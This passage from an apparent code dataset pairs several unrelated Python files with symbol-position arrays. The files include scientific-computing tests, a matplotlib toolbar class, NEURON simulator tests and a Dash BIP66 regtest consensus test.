1731
],
[
3747,
3755
]
],
[
[
184,
192
],
[
2986,
2994
]
],
[
[
238,
262
],
[
2829,
2853
]
],
[
[
304,
316
],
[
825,
837
]
],
[
[
337,
343
],
[
538,
544
]
],
[
[
345,
357
],
[
659,
671
]
],
[
[
359,
367
],
[
2003,
2011
],
[
2145,
2153
],
[
2415,
2423
],
[
2554,
2562
]
],
[
[
400,
797
]
],
[
[
806,
824
],
[
700,
718
]
]
] |
import csv
import time
import os
import pandas as pd
DATA_ROOT = "C:\\RS\\Amazon\\All\\"
MINIMUM_X_CATEGORIES_FILENAME = 'minimum_2_Categories.csv'
timestamp = time.strftime('%y%m%d%H%M%S')
out_filename = os.path.join(DATA_ROOT, timestamp + 'categories_permutations.csv')
with open(out_filename, 'w', newline='', encoding='utf8') as sum_f:
writer = csv.writer(sum_f, delimiter=',', lineterminator='\n')
entire_data = pd.read_csv(os.path.join(DATA_ROOT, MINIMUM_X_CATEGORIES_FILENAME))
categories = entire_data.columns
row = ['idx_cat_a', 'cat_a', 'idx_cat_b', 'cat_b', 'user_count', 'item_count_a', 'item_count_b', 'item_both']
writer.writerow(row)
for idx_cat_a, cat_a in enumerate(categories):
if idx_cat_a == 0:
continue
for idx_cat_b, cat_b in enumerate(categories):
if idx_cat_b <= idx_cat_a:
continue
# print(idx_cat_a, cat_a, idx_cat_b, cat_b)
# user_count_a = entire_data[cat_a].astype(bool).sum()
# user_count_b = entire_data[cat_b].astype(bool).sum()
user_count = entire_data.loc[entire_data[cat_b] != 0, cat_a].astype(bool).sum()
# item_count_a = entire_data[cat_a].sum()
# item_count_b = entire_data[cat_b].sum()
item_count_a = entire_data.loc[(entire_data[cat_a] != 0) & (entire_data[cat_b] != 0), cat_a].sum()
item_count_b = entire_data.loc[(entire_data[cat_a] != 0) & (entire_data[cat_b] != 0), cat_b].sum()
item_both = item_count_a + item_count_b
row = [idx_cat_a, cat_a, idx_cat_b, cat_b,user_count, item_count_a, item_count_b, item_both]
writer.writerow(row)
| [
[
[
8,
11
],
[
357,
360
]
],
[
[
19,
23
],
[
164,
168
]
],
[
[
31,
33
],
[
209,
211
],
[
441,
443
]
],
[
[
42,
54
],
[
429,
431
]
],
[
[
56,
65
],
[
222,
231
],
[
454,
463
]
],
[
[
92,
121
],
[
465,
494
]
],
[
[
152,
161
],
[
233,
242
]
],
[
[
194,
206
],
[
286,
298
]
],
[
[
337,
342
],
[
368,
373
]
],
[
[
348,
354
],
[
652,
658
],
[
1673,
1679
]
],
[
[
415,
426
],
[
514,
525
],
[
1106,
1117
],
[
1122,
1133
],
[
1308,
1319
],
[
1325,
1336
],
[
1353,
1364
],
[
1419,
1430
],
[
1436,
1447
],
[
1464,
1475
]
],
[
[
501,
511
],
[
711,
721
],
[
814,
824
]
],
[
[
538,
541
],
[
668,
671
]
],
[
[
681,
690
],
[
735,
744
],
[
855,
864
],
[
1575,
1584
]
],
[
[
692,
697
],
[
1147,
1152
],
[
1337,
1342
],
[
1379,
1384
],
[
1448,
1453
],
[
1586,
1591
]
],
[
[
784,
793
],
[
842,
851
],
[
1593,
1602
]
],
[
[
795,
800
],
[
1134,
1139
],
[
1365,
1370
],
[
1476,
1481
],
[
1490,
1495
],
[
1604,
1609
]
],
[
[
1093,
1103
],
[
1610,
1620
]
],
[
[
1293,
1305
],
[
1527,
1539
],
[
1622,
1634
]
],
[
[
1404,
1416
],
[
1542,
1554
],
[
1636,
1648
]
],
[
[
1515,
1524
],
[
1650,
1659
]
],
[
[
1568,
1571
],
[
1689,
1692
]
]
] |
from persistent.interfaces import IPersistent
import lxml.objectify
import mock
import unittest
import zeit.cms.workingcopy.interfaces
import zeit.edit.container
import zeit.edit.testing
import zeit.edit.tests.fixture
import zope.interface
import zope.security.proxy
class TestContainer(unittest.TestCase):
def get_container(self):
parent = mock.Mock()
parent._p_changed = False
zope.interface.alsoProvides(parent, IPersistent)
class Container(zeit.edit.container.Base):
def _add(self, item):
pass
def _delete(self, key):
pass
def _get_keys(self, node):
return []
return Container(parent, mock.Mock())
def test_delitem_should_set_p_changed(self):
container = self.get_container()
del container['foo']
self.assertTrue(container.__parent__._p_changed)
def test_add_should_set_p_changed(self):
container = self.get_container()
item = mock.Mock()
item.__name__ = 'item'
item.__parent__ = None
container.add(item)
self.assertTrue(container.__parent__._p_changed)
def test_updateOrder_should_set_p_changed(self):
container = self.get_container()
container.updateOrder([])
self.assertTrue(container.__parent__._p_changed)
class UnknownBlockTest(zeit.edit.testing.FunctionalTestCase):
def test_no_factory_for_node_returns_UnknownBlock(self):
xml = lxml.objectify.fromstring("""
<container xmlns:cp="http://namespaces.zeit.de/CMS/cp">
<block cp:type="block" cp:__name__="foo"/>
<something cp:__name__="bar"/>
</container>
""")
container = zeit.edit.tests.fixture.Container(mock.Mock(), xml)
self.assertTrue(zeit.edit.interfaces.IUnknownBlock.providedBy(
container['bar']))
class ContainerTest(zeit.edit.testing.FunctionalTestCase):
def setUp(self):
super(ContainerTest, self).setUp()
self.context = mock.Mock()
zope.interface.alsoProvides(self.context, IPersistent)
self.container = zeit.edit.tests.fixture.Container(
self.context, lxml.objectify.fromstring('<container/>'))
def test_slice(self):
blocks = [self.container.create_item('block') for i in range(4)]
expected = [blocks[0], blocks[1]]
expected = [x.__name__ for x in expected]
actual = [x.__name__ for x in self.container.slice(
blocks[0].__name__, blocks[1].__name__)]
self.assertEqual(expected, actual)
def test_get_recursive_finds_item_in_self(self):
block = self.container.create_item('block')
self.assertEqual(block, self.container.get_recursive(block.__name__))
def test_get_recursive_finds_item_in_child_container(self):
other = self.container.create_item('container')
block = other.create_item('block')
self.assertEqual(block, self.container.get_recursive(block.__name__))
def test_moving_item_between_containers_sends_event(self):
check_move = mock.Mock()
zope.component.getGlobalSiteManager().registerHandler(
check_move, (zeit.edit.interfaces.IBlock,
zope.lifecycleevent.IObjectMovedEvent))
block = self.container.create_item('block')
other = zeit.edit.tests.fixture.Container(
self.context, lxml.objectify.fromstring('<container/>'))
del self.container[block.__name__]
other.add(block)
self.assertTrue(check_move.called)
def test_moved_item_has_new_parent(self):
# Annoying mechanics gymnastics to check that security works.
wc = zeit.cms.workingcopy.interfaces.IWorkingcopy(None)
self.container.__parent__ = wc
other = zeit.edit.tests.fixture.Container(
wc, lxml.objectify.fromstring('<container/>'))
block = self.container.create_item('block')
del self.container[block.__name__]
wrapped = zope.security.proxy.ProxyFactory(block)
other.add(wrapped)
# Since we don't retrieve block from other, this actually checks that
# __parent__ was changed.
self.assertEqual(other, block.__parent__)
def test_getitem_with_int_uses_position(self):
block = self.container.create_item('block')
self.assertEqual(block, self.container[0])
with self.assertRaises(KeyError):
self.container[1]
| [
[
[
34,
45
],
[
446,
457
],
[
2107,
2118
]
],
[
[
53,
67
],
[
1500,
1504
],
[
2206,
2210
],
[
3431,
3435
],
[
3872,
3876
]
],
[
[
75,
79
],
[
356,
360
],
[
723,
727
],
[
1015,
1019
],
[
1776,
1780
],
[
2045,
2049
],
[
3108,
3112
]
],
[
[
87,
95
],
[
289,
297
]
],
[
[
103,
134
]
],
[
[
142,
161
]
],
[
[
169,
186
]
],
[
[
194,
217
],
[
1385,
1389
],
[
1918,
1922
],
[
484,
488
],
[
1742,
1746
],
[
1818,
1822
],
[
2145,
2149
],
[
3208,
3212
],
[
3370,
3374
],
[
3715,
3719
],
[
3821,
3825
]
],
[
[
225,
239
]
],
[
[
247,
266
],
[
410,
414
],
[
2065,
2069
],
[
3128,
3132
],
[
3262,
3266
],
[
4028,
4032
]
],
[
[
275,
288
]
],
[
[
1368,
1384
]
],
[
[
1904,
1917
],
[
1993,
2006
]
]
] |
from django.contrib import admin
from .models import Artists, Albums, Tracks
# Register your models here.
admin.site.register([Artists, Albums, Tracks]) | [
[
[
27,
32
],
[
107,
112
]
],
[
[
53,
60
],
[
128,
135
]
],
[
[
62,
68
],
[
137,
143
]
],
[
[
70,
76
],
[
145,
151
]
]
] |
import numpy as np
import astropy.units as u
from astropy.convolution.kernels import Gaussian2DKernel
from scipy import signal
from ..clean import clean, ms_clean, component, radial_prolate_sphereoidal,\
vec_radial_prolate_sphereoidal
from ..transform import dft_map, idft_map
def test_clean_ideal():
n = m = 65
pos1 = [15, 30]
pos2 = [40, 32]
clean_map = np.zeros((n, m))
clean_map[pos1[0], pos1[1]] = 10.
clean_map[pos2[0], pos2[1]] = 7.
dirty_beam = np.zeros((n, m))
dirty_beam[(n-1)//4:(n-1)//4 + (n-1)//2, (m-1)//2] = 0.75
dirty_beam[(n-1)//2, (m-1)//4:(m-1)//4 + (m-1)//2, ] = 0.75
dirty_beam[(n-1)//2, (m-1)//2] = 0.8
dirty_beam = np.pad(dirty_beam, (65, 65), 'constant')
dirty_map = signal.convolve(clean_map, dirty_beam, mode='same')
# Disable convolution of model with gaussian for testing
out_map = clean(dirty_map, dirty_beam, clean_beam_width=0.0)
# Within threshold default threshold of 0.1
assert np.allclose(clean_map, (out_map[0]+out_map[1]), out_map, atol=dirty_beam.max() * 0.1)
def test_component():
comp = np.zeros((3, 3))
comp[1, 1] = 1.0
res = component(scale=0, shape=(3, 3))
assert np.array_equal(res, comp)
res = component(scale=1, shape=(3, 3))
assert np.array_equal(res, comp)
res = component(scale=2, shape=(6, 6))
assert np.all(res[0, :] == 0.0)
assert np.all(res[:, 0] == 0.0)
assert np.all(res[2:4, 2:4] == res.max())
res = component(scale=3, shape=(7, 7))
assert np.all(res[0, :] == 0.0)
assert np.all(res[:, 0] == 0.0)
assert res[3, 3] == 1
def test_radial_prolate_spheroidal():
amps = [radial_prolate_sphereoidal(r) for r in [-1.0, 0.0, 0.5, 1.0, 2.0]]
assert amps[0] == 1.0
assert amps[1] == 1.0
assert amps[2] == 0.36106538453111797
assert amps[3] == 0.0
assert amps[4] == 0.0
def test_vec_radial_prolate_spheroidal():
radii = np.linspace(-0.5, 1.5, 1000)
amps1 = [radial_prolate_sphereoidal(r) for r in radii]
amps2 = vec_radial_prolate_sphereoidal(radii)
assert np.allclose(amps1, amps2)
def test_ms_clean_ideal():
n = m = 65
pos1 = [15, 30]
pos2 = [40, 32]
clean_map = np.zeros((n, m))
clean_map[pos1[0], pos1[1]] = 10.
clean_map[pos2[0], pos2[1]] = 7.
dirty_beam = np.zeros((n, m))
dirty_beam[(n-1)//4:(n-1)//4 + (n-1)//2, (m-1)//2] = 0.75
dirty_beam[(n-1)//2, (m-1)//4:(m-1)//4 + (m-1)//2, ] = 0.75
dirty_beam[(n-1)//2, (m-1)//2] = 1.0
dirty_beam = np.pad(dirty_beam, (65, 65), 'constant')
dirty_map = signal.convolve2d(clean_map, dirty_beam, mode='same')
# Disable convolution of model with gaussian for testing
model, res = ms_clean(dirty_map, dirty_beam, scales=[1], clean_beam_width=0.0)
recovered = model + res
# Within threshold default threshold
assert np.allclose(clean_map, recovered, atol=dirty_beam.max() * 0.1)
def test_clean_sim():
n = m = 32
data = Gaussian2DKernel(stddev=3.0, x_size=n, y_size=m).array
# data = np.zeros((n, m))
# data[13,13] = 10.0
# data[12:14,12:14] = 10.0/4.0
half_log_space = np.logspace(np.log10(0.03030303), np.log10(0.48484848), 10)
theta = np.linspace(0, 2*np.pi, 32)
theta = theta[np.newaxis, :]
theta = np.repeat(theta, 10, axis=0)
r = half_log_space
r = r[:, np.newaxis]
r = np.repeat(r, 32, axis=1)
x = r * np.sin(theta)
y = r * np.cos(theta)
sub_uv = np.vstack([x.flatten(), y.flatten()])
sub_uv = np.hstack([sub_uv, np.zeros((2, 1))]) / u.arcsec
# Factor of 9 is compensate for the factor of 3 * 3 increase in size
dirty_beam = idft_map(np.ones(321)*9, (n*3, m*3), sub_uv)
vis = dft_map(data, sub_uv)
dirty_map = idft_map(vis, (n, m), sub_uv)
clean_map, res = clean(dirty_map, dirty_beam, clean_beam_width=0)
    assert np.allclose(data, clean_map + res, atol=dirty_beam.max() * 0.1)
| [
[
[
7,
18
],
[
381,
383
],
[
491,
493
],
[
692,
694
],
[
989,
991
],
[
1110,
1112
],
[
1203,
1205
],
[
1284,
1286
],
[
1365,
1367
],
[
1401,
1403
],
[
1437,
1439
],
[
1527,
1529
],
[
1563,
1565
],
[
1935,
1937
],
[
2084,
2086
],
[
2211,
2213
],
[
2321,
2323
],
[
2522,
2524
],
[
2860,
2862
],
[
3140,
3142
],
[
3152,
3154
],
[
3174,
3176
],
[
3213,
3215
],
[
3230,
3232
],
[
3259,
3261
],
[
3286,
3288
],
[
3352,
3354
],
[
3372,
3374
],
[
3410,
3412
],
[
3436,
3438
],
[
3464,
3466
],
[
3515,
3517
],
[
3534,
3536
],
[
3665,
3667
],
[
3856,
3858
]
],
[
[
26,
44
],
[
3555,
3556
]
],
[
[
85,
101
],
[
2973,
2989
]
],
[
[
121,
127
],
[
750,
756
],
[
2580,
2586
]
],
[
[
149,
154
],
[
878,
883
],
[
3803,
3808
]
],
[
[
156,
164
],
[
2713,
2721
]
],
[
[
166,
175
],
[
1159,
1168
],
[
1240,
1249
],
[
1321,
1330
],
[
1483,
1492
]
],
[
[
177,
203
],
[
1666,
1692
],
[
1977,
2003
]
],
[
[
210,
240
],
[
2035,
2065
]
],
[
[
265,
272
],
[
3712,
3719
]
],
[
[
274,
282
],
[
3656,
3664
],
[
3751,
3759
]
],
[
[
289,
305
]
],
[
[
1081,
1095
]
],
[
[
1620,
1650
]
],
[
[
1885,
1919
]
],
[
[
2116,
2135
]
],
[
[
2929,
2943
]
]
] |
# -*-coding:Utf-8 -*
from mplotlab import App
from matplotlib.backend_bases import NavigationToolbar2
import wx
class Cursors:
# this class is only used as a simple namespace
HAND, POINTER, SELECT_REGION, MOVE = list(range(4))
cursors = Cursors()
cursord = {
cursors.MOVE : wx.CURSOR_HAND,
cursors.HAND : wx.CURSOR_HAND,
cursors.POINTER : wx.CURSOR_ARROW,
cursors.SELECT_REGION : wx.CURSOR_CROSS,
}
class Navigation(NavigationToolbar2):
def __init__(self,*a,**k):
NavigationToolbar2.__init__(self, *a,**k)
def _init_toolbar(self,*args,**kwargs):
pass
def set_message(self,s):
""" display in the status bar
the mouseover data (x,y)
"""
try:
App().mainWin.GetStatusBar().SetStatusText(s,0)
except:
pass
def set_cursor(self, cursor):
cursor =wx.StockCursor(cursord[cursor])
self.canvas.SetCursor( cursor )
def dynamic_update(self):
d = self._idle
self._idle = False
if d:
self.canvas.draw()
self._idle = True
def press(self, event):
if self._active == 'ZOOM':
self.wxoverlay = wx.Overlay()
def release(self, event):
if self._active == 'ZOOM':
# When the mouse is released we reset the overlay and it
# restores the former content to the window.
self.wxoverlay.Reset()
del self.wxoverlay
def draw_rubberband(self, event, x0, y0, x1, y1):
# Use an Overlay to draw a rubberband-like bounding box.
dc = wx.ClientDC(self.canvas)
odc = wx.DCOverlay(self.wxoverlay, dc)
odc.Clear()
# Mac's DC is already the same as a GCDC, and it causes
# problems with the overlay if we try to use an actual
# wx.GCDC so don't try it.
if 'wxMac' not in wx.PlatformInfo:
dc = wx.GCDC(dc)
height = self.canvas.figure.bbox.height
y1 = height - y1
y0 = height - y0
if y1<y0: y0, y1 = y1, y0
        if x1<x0: x0, x1 = x1, x0
w = x1 - x0
h = y1 - y0
rect = wx.Rect(x0, y0, w, h)
rubberBandColor = '#C0C0FF' # or load from config?
# Set a pen for the border
color = wx.NamedColour(rubberBandColor)
dc.SetPen(wx.Pen(color, 1))
# use the same color, plus alpha for the brush
r, g, b = color.Get()
color.Set(r,g,b, 0x60)
dc.SetBrush(wx.Brush(color))
dc.DrawRectangleRect(rect)
| [
[
[
45,
48
],
[
807,
810
]
],
[
[
87,
105
],
[
468,
486
],
[
530,
548
]
],
[
[
116,
118
],
[
303,
305
],
[
339,
341
],
[
378,
380
],
[
424,
426
],
[
944,
946
],
[
1277,
1279
],
[
1694,
1696
],
[
1734,
1736
],
[
1982,
1984
],
[
2017,
2019
],
[
2264,
2266
],
[
2403,
2405
],
[
2454,
2456
],
[
2614,
2616
]
],
[
[
128,
135
],
[
258,
265
]
],
[
[
248,
255
],
[
288,
295
],
[
324,
331
],
[
360,
367
],
[
400,
407
]
],
[
[
271,
278
],
[
959,
966
]
],
[
[
457,
467
]
]
] |
"""
UnitTests of the python interface to the neuron class.
Items declared in neuron/__init__.py
$Id$
"""
import unittest
import neuron
from neuron import h
class NeuronTestCase(unittest.TestCase):
"""Tests of neuron"""
def testHClass(self):
"""Test subclass of hoc class."""
from ._subclass import A1
a = A1(5)
assert a.x == 5.0
assert a.p() == 6.0
b = A1(4)
a.s = "one"
b.s = "two"
assert a.s == "one"
assert b.s == "two"
assert h.A[0].s == "one"
assert a.p() == 7.0
assert b.p() == 5.0
a.a = 2
b.a = 3
assert a.a == 2
assert b.a == 3
assert h.List("A").count() == 2
a = 1
b = 1
assert h.List("A").count() == 0
@classmethod
def psection(cls):
"""Test neuron.psection(Section)"""
s = h.Section(name="soma")
neuron.psection(s)
def testpsection(self):
from multiprocessing import Process
p = Process(target=NeuronTestCase.psection)
p.start()
p.join()
def testABI(self):
"""Test use of some Py_LIMITED_API for python3."""
# Py_nb_bool
assert True if h else False
assert True if h.List else False
# ensure creating a List doesn't change the truth value
l = h.List()
assert True if h.List else False
assert False if l else True
v = h.Vector(1)
l.append(v)
assert True if l else False
# Py_sq_length
assert len(l) == 1
# Py_sq_item
assert l[0] == v
# Py_sq_ass_item
v.x[0] = 5
assert v.x[0] == 5
def testIterators(self):
"""Test section, segment, mechanism, rangevar iterators."""
# setup model
sections = [h.Section(name="s%d" % i) for i in range(3)]
iclamps = [h.IClamp(sec(0.5)) for sec in sections]
for i, sec in enumerate(sections):
sec.nseg = 3
sec.insert("pas")
sec.insert("hh")
# iterate
import hashlib
sha = hashlib.sha256()
for sec in h.allsec():
for seg in sec:
for mech in seg:
for var in mech:
txt = "%s(%g).%s.%s=%g" % (
sec.name(),
seg.x,
mech.name(),
var.name(),
var[0],
)
sha.update(txt.encode("utf-8"))
d = sha.hexdigest()
d1 = "ac49344c054bc9e56e165fa75423d8bcb7cce96c4527f259362b527ee05103d8"
# in case NRN_ENABLE_MOD_COMPATIBILITY=ON
# (set by -DNRN_ENABLE_CORENEURON=ON)
d2 = "44366906aa94a50644bc734eb23afcc25d1206c0431c4e7908698eeb2597c385"
assert d == d1 or d == d2
sections[0](0.5).na_ion.ena = 40.0 # issue #651
assert sections[0](0.5).na_ion.ena == 40.0
def testSectionArgOrder(self):
"""First optional arg for Section is name (but name="name" is recommended)"""
soma = h.Section("soma")
assert soma.name() == "soma"
def testSectionCell(self):
"""Section.cell() internally referenced as weakref."""
err = -1
try:
soma = h.Section(cell="foo", name="soma")
err = 1
except:
err = 0
assert err == 0
class Cell:
def __str__(self):
return "hello"
c = Cell()
soma = h.Section(cell=c, name="soma")
assert soma.name() == "hello.soma"
assert soma.cell() == c
del c
assert soma.cell() is None
def testSectionListIterator(self):
"""As of v8.0, iteration over a SectionList does not change the cas"""
# See issue 509. SectionList iterator bug requires change to
# longstanding behavior
soma = h.Section(name="soma")
soma.push()
sections = [h.Section(name="s%d" % i) for i in range(3)]
assert len([s for s in h.allsec()]) == 4
sl = h.SectionList(sections)
# Iteration over s SectionList does not change the currently accessed section
for s in sl:
assert 1 and h.cas() == soma
# If an iteration does not complete the section stack is still ok.
assert sections[1] in sl
assert 2 and h.cas() == soma
@classmethod
def ExtendedSection(cls):
"""test prsection (modified print statement)"""
from neuron.sections import ExtendedSection
s = ExtendedSection(name="test")
s.psection()
def testExtendedSection(self):
from multiprocessing import Process
p = Process(target=NeuronTestCase.ExtendedSection)
p.start()
p.join()
@classmethod
def RxDexistence(cls):
"""test import rxd and geometry3d"""
error = 0
try:
from neuron import rxd
from neuron.rxd import geometry
print("has_geometry3d is " + str(geometry.has_geometry3d))
except Exception as e:
print("'from neuron import rxd' failed", e)
error = 1
else:
try:
a = basicRxD3D()
print(" basicRxD3D() ran with no exception")
except Exception as e:
print("'basicRxD3D()' failed", e)
error = 1
assert error == 0
return 0
def testHelp(self):
error = False
try:
from neuron import doc
print(doc.get_docstring("xpanel", ""))
except Exception as e:
print("'doc.get_docstring('xpanel', '')' failed:", e)
error = True
self.assertFalse(error)
return 0
def testRxDexistence(self):
from multiprocessing import Process
p = Process(target=NeuronTestCase.RxDexistence)
p.start()
p.join()
assert p.exitcode == 0
return 0
def test_newobj_err(self):
"""Test deletion of incompletely constructed objects"""
print() # Error message not on above line
h.load_file("stdlib.hoc") # need hoc String
h(
"""
begintemplate Foo
endtemplate Foo
begintemplate NewObj
objref this, ob, foo1, foo2
proc init() {localobj s
foo1 = new Foo() // Constructed before error, even partial constructions fill this field.
if ($1 == 0) {
execerror("generate an error") // All NewObj instances undergoing construction
} else if ($1 == $2) {
// This and all NewObj instances prior to this will construct successfully.
// All after this will be partially constructed.
// The execerror should cause only the partially constructed NewObj to
// be destroyed.
s = new String()
sprint(s.s, "ob = new NewObj(%d, %d)", $1-1, $2)
execute1(s.s, this)
} else {
ob = new NewObj($1-1, $2)
}
foo2 = new Foo() // Only instances prior to execute1 reach here.
}
endtemplate NewObj
"""
)
# arg[0] recursion depth
# arg[0] - arg[1] + 1 should be successfully constructed
# arg[1] should be partially constructed and destroyed.
args = (4, 2)
a = h.NewObj(*args)
b = h.List("NewObj")
c = h.List("Foo")
print("#NewObj and #Foo in existence", b.count(), c.count())
z = args[0] - args[1] + 1
assert b.count() == z
assert c.count() == 2 * z
del a
del b
del c
b = h.List("NewObj")
c = h.List("Foo")
print("after del a #NewObj and #Foo in existence", b.count(), c.count())
assert b.count() == 0
assert c.count() == 0
return 1
def basicRxD3D():
from neuron import h, rxd
s = h.Section(name="s")
s.L = s.diam = 1
cyt = rxd.Region([s])
ca = rxd.Species(cyt)
rxd.set_solve_type(dimension=3)
h.finitialize(-65)
h.fadvance()
return 1
def suite():
suite = unittest.makeSuite(NeuronTestCase, "test")
return suite
if __name__ == "__main__":
# unittest.main()
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite())
| [
[
[
114,
122
],
[
181,
189
],
[
8171,
8179
],
[
8046,
8054
]
],
[
[
130,
136
],
[
924,
930
]
],
[
[
156,
157
],
[
533,
534
],
[
702,
703
],
[
770,
771
],
[
893,
894
],
[
1233,
1234
],
[
1269,
1270
],
[
1363,
1364
],
[
1395,
1396
],
[
1461,
1462
],
[
1837,
1838
],
[
1901,
1902
],
[
2160,
2161
],
[
3159,
3160
],
[
3358,
3359
],
[
3591,
3592
],
[
3981,
3982
],
[
4044,
4045
],
[
4120,
4121
],
[
4151,
4152
],
[
4307,
4308
],
[
4452,
4453
],
[
6215,
6216
],
[
6268,
6269
],
[
7282,
7283
],
[
7310,
7311
],
[
7339,
7340
],
[
7575,
7576
],
[
7604,
7605
]
],
[
[
166,
180
],
[
1044,
1058
],
[
4795,
4809
],
[
5948,
5962
],
[
8065,
8079
]
],
[
[
7783,
7793
],
[
5294,
5304
]
],
[
[
8024,
8029
],
[
8223,
8228
]
],
[
[
8162,
8168
],
[
8212,
8218
]
]
] |
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test BIP66 (DER SIG).
Test that the DERSIG soft-fork activates at (regtest) height 1251.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.mininode import *
from test_framework.blocktools import create_coinbase, create_block
from test_framework.script import CScript
from io import BytesIO
DERSIG_HEIGHT = 1251
# Reject codes that we might receive in this test
REJECT_INVALID = 16
REJECT_OBSOLETE = 17
REJECT_NONSTANDARD = 64
# A canonical signature consists of:
# <30> <total len> <02> <len R> <R> <02> <len S> <S> <hashtype>
def unDERify(tx):
"""
Make the signature in vin 0 of a tx non-DER-compliant,
by adding padding after the S-value.
"""
scriptSig = CScript(tx.vin[0].scriptSig)
newscript = []
for i in scriptSig:
if (len(newscript) == 0):
newscript.append(i[0:-1] + b'\0' + i[-1:])
else:
newscript.append(i)
tx.vin[0].scriptSig = CScript(newscript)
def create_transaction(node, coinbase, to_address, amount):
from_txid = node.getblock(coinbase)['tx'][0]
inputs = [{ "txid" : from_txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
tx = CTransaction()
tx.deserialize(BytesIO(hex_str_to_bytes(signresult['hex'])))
return tx
class BIP66Test(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [['-whitelist=127.0.0.1', '-dip3params=9000:9000']]
self.setup_clean_chain = True
def run_test(self):
self.nodes[0].add_p2p_connection(P2PInterface())
network_thread_start()
# wait_for_verack ensures that the P2P connection is fully up.
self.nodes[0].p2p.wait_for_verack()
self.log.info("Mining %d blocks", DERSIG_HEIGHT - 2)
self.coinbase_blocks = self.nodes[0].generate(DERSIG_HEIGHT - 2)
self.nodeaddress = self.nodes[0].getnewaddress()
self.log.info("Test that a transaction with non-DER signature can still appear in a block")
spendtx = create_transaction(self.nodes[0], self.coinbase_blocks[0],
self.nodeaddress, 1.0)
unDERify(spendtx)
spendtx.rehash()
tip = self.nodes[0].getbestblockhash()
block_time = self.nodes[0].getblockheader(tip)['mediantime'] + 1
block = create_block(int(tip, 16), create_coinbase(DERSIG_HEIGHT - 1), block_time)
block.nVersion = 2
block.vtx.append(spendtx)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
self.log.info("Test that blocks must now be at least version 3")
tip = block.sha256
block_time += 1
block = create_block(tip, create_coinbase(DERSIG_HEIGHT), block_time)
block.nVersion = 2
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), tip)
wait_until(lambda: "reject" in self.nodes[0].p2p.last_message.keys(), lock=mininode_lock)
with mininode_lock:
assert_equal(self.nodes[0].p2p.last_message["reject"].code, REJECT_OBSOLETE)
assert_equal(self.nodes[0].p2p.last_message["reject"].reason, b'bad-version(0x00000002)')
assert_equal(self.nodes[0].p2p.last_message["reject"].data, block.sha256)
del self.nodes[0].p2p.last_message["reject"]
self.log.info("Test that transactions with non-DER signatures cannot appear in a block")
block.nVersion = 3
spendtx = create_transaction(self.nodes[0], self.coinbase_blocks[1],
self.nodeaddress, 1.0)
unDERify(spendtx)
spendtx.rehash()
# First we show that this tx is valid except for DERSIG by getting it
# rejected from the mempool for exactly that reason.
assert_raises_rpc_error(-26, '64: non-mandatory-script-verify-flag (Non-canonical DER signature)', self.nodes[0].sendrawtransaction, bytes_to_hex_str(spendtx.serialize()), True)
# Now we verify that a block with this transaction is also invalid.
block.vtx.append(spendtx)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), tip)
wait_until(lambda: "reject" in self.nodes[0].p2p.last_message.keys(), lock=mininode_lock)
with mininode_lock:
# We can receive different reject messages depending on whether
# dashd is running with multiple script check threads. If script
# check threads are not in use, then transaction script validation
# happens sequentially, and dashd produces more specific reject
# reasons.
assert self.nodes[0].p2p.last_message["reject"].code in [REJECT_INVALID, REJECT_NONSTANDARD]
assert_equal(self.nodes[0].p2p.last_message["reject"].data, block.sha256)
if self.nodes[0].p2p.last_message["reject"].code == REJECT_INVALID:
# Generic rejection when a block is invalid
assert_equal(self.nodes[0].p2p.last_message["reject"].reason, b'block-validation-failed')
else:
assert b'Non-canonical DER signature' in self.nodes[0].p2p.last_message["reject"].reason
self.log.info("Test that a version 3 block with a DERSIG-compliant transaction is accepted")
block.vtx[1] = create_transaction(self.nodes[0],
self.coinbase_blocks[1], self.nodeaddress, 1.0)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), block.sha256)
if __name__ == '__main__':
BIP66Test().main()
| [
[
[
354,
374
],
[
1643,
1663
]
],
[
[
407,
408
]
],
[
[
445,
446
],
[
1531,
1543
],
[
1573,
1589
],
[
1906,
1918
],
[
1931,
1951
],
[
2946,
2955
],
[
2972,
2984
],
[
3346,
3355
],
[
3372,
3384
],
[
3442,
3452
],
[
3517,
3530
],
[
3545,
3558
],
[
3572,
3584
],
[
3661,
3673
],
[
3763,
3775
],
[
4335,
4358
],
[
4468,
4484
],
[
4766,
4775
],
[
4792,
4804
],
[
4862,
4872
],
[
4937,
4950
],
[
4965,
4978
],
[
5428,
5440
],
[
5658,
5670
],
[
6236,
6245
],
[
6262,
6274
]
],
[
[
485,
500
],
[
2695,
2710
],
[
3190,
3205
]
],
[
[
502,
514
],
[
2668,
2680
],
[
3172,
3184
]
],
[
[
549,
556
],
[
970,
977
],
[
1203,
1210
]
],
[
[
572,
579
],
[
1565,
1572
]
],
[
[
581,
594
],
[
2113,
2126
],
[
2186,
2199
],
[
2711,
2724
],
[
3206,
3219
]
],
[
[
653,
667
],
[
5380,
5394
],
[
5566,
5580
]
],
[
[
673,
688
],
[
3632,
3647
]
],
[
[
694,
712
],
[
5396,
5414
]
],
[
[
824,
832
],
[
2488,
2496
],
[
4144,
4152
]
],
[
[
1227,
1245
],
[
2382,
2400
],
[
4038,
4056
],
[
5996,
6014
]
],
[
[
1633,
1642
],
[
6364,
6373
]
]
] |
import collections
EstimatorSetting = collections.namedtuple(
'EstimatorSetting', ['title', 'estimator', 'parameter_space'])
| [
[
[
7,
18
],
[
39,
50
]
],
[
[
20,
36
]
]
] |
# coding=utf-8
from OTLMOW.PostenMapping.StandaardPost import StandaardPost
